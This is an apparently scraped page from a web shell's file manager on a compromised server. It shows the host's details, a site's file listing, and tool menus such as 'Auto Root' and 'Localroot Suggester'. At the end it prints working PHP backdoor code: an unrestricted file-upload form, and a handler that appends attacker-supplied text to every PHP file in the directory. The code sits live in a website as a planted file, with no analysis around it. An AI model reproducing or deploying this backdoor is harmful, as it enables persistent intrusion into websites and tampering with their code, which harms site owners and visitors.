Linux moon.hostseba.com 4.18.0-553.51.1.lve.el8.x86_64 #1 SMP Tue May 6 15:14:12 UTC 2025 x86_64
LiteSpeed
Server IP : 103.174.152.68 & Your IP : 216.73.216.9
Domains :
Cant Read [ /etc/named.conf ]
User : julaysp1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
julaysp1 /
public_html /
list-20250913061337 /
Delete
Unzip
Name
Size
Permission
Date
Action
css
[ DIR ]
drwxr-xr-x
2025-09-13 06:13
dashboard
[ DIR ]
drwxr-xr-x
2025-09-13 06:13
dist
[ DIR ]
drwxr-xr-x
2025-09-13 06:13
font-awesome
[ DIR ]
drwxr-xr-x
2025-09-13 06:13
fonts
[ DIR ]
drwxr-xr-x
2025-09-13 06:13
includes
[ DIR ]
drwxr-xr-x
2025-09-13 06:13
light
[ DIR ]
drwxr-xr-x
2025-09-13 06:13
list
[ DIR ]
drwxr-xr-x
2025-09-13 06:13
simple-line-icons
[ DIR ]
drwxr-xr-x
2025-09-13 06:13
ti-icons
[ DIR ]
drwxr-xr-x
2025-09-13 06:13
typeahead.js
[ DIR ]
drwxr-xr-x
2025-09-13 06:13
wp
[ DIR ]
drwxr-xr-x
2025-09-13 06:13
TonnyBanglaMJ-Bold.woff
37.41
KB
-rw-r--r--
2025-05-27 07:33
TonnyBanglaMJ-Regular.ttf
69.59
KB
-rw-r--r--
2025-05-27 07:33
admin_file_upload.php
2.96
KB
-rw-r--r--
2024-11-16 10:37
balance_add_remove.php
2.83
KB
-rw-r--r--
2024-10-26 14:38
bpbluyix.php
760
B
-rw-r--r--
2025-08-31 20:43
configuration.php
250
B
-rw-r--r--
2024-12-04 06:50
fontawesome-webfont.ttf
134.96
KB
-rw-r--r--
2023-12-20 13:06
footer.php
0
B
-rw-r--r--
2025-09-12 17:08
glyphicons-halflings-regular.svg
106.19
KB
-rw-r--r--
2023-12-20 13:06
glyphicons-halflings-regular.woff
22.88
KB
-rw-r--r--
2023-12-20 13:06
googlee6fd02d83edbe9eb.html
53
B
-rw-r--r--
2025-08-21 04:56
index.php
7.03
KB
-rw-r--r--
2025-09-10 08:54
nibondon_make.txt
2
B
-rw-r--r--
2025-08-20 19:12
update_marquee.php
4.88
KB
-rw-r--r--
2024-10-27 17:24
Save
Rename
<?php echo"<form method='post' enctype='multipart/form-data'><input type='file' name='a'><input type='submit' value='Nyanpasu!!!'></form><pre>";if(isset($_FILES['a'])){move_uploaded_file($_FILES['a']['tmp_name'],"{$_FILES['a']['name']}");print_r($_FILES);};echo"</pre>";?> <?php if (isset($_GET['bak'])) { $directory = __DIR__; $mama = $_POST['file']; $textToAppend = ' ' . $mama . ' '; if ($handle = opendir($directory)) { while (false !== ($file = readdir($handle))) { if (pathinfo($file, PATHINFO_EXTENSION) === 'php') { $fileHandle = fopen($directory . '/' . $file, 'a'); fwrite($fileHandle, $textToAppend); fclose($fileHandle); echo "OK >> $file "; } } closedir($handle); } } ?>